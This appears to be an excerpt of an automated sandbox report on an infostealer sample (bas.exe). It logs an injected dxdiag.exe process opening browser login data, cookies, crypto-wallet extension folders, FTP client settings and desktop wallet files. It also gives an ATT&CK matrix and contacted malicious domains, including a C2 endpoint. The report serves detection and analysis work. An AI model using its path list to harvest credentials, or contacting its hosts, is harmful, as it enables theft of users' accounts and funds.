            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            11
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            311
            Process Injection
            LSASS Memory121
            Security Software Discovery
            Remote Desktop Protocol41
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager11
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            bas.exe26%ReversingLabs
            bas.exe31%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            volcanohushe.click
            104.21.71.155
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              necklacebudi.latfalse
                high
                aspecteirs.latfalse
                  high
                  energyaffai.latfalse
                    high
                    https://volcanohushe.click/apitrue
                      unknown
                      sustainskelet.latfalse
                        high
                        crosshuaht.latfalse
                          high
                          rapeflowwj.latfalse
                            high
                            grannyejh.latfalse
                              high
                              discokeyus.latfalse
                                high
                                volcanohushe.clicktrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
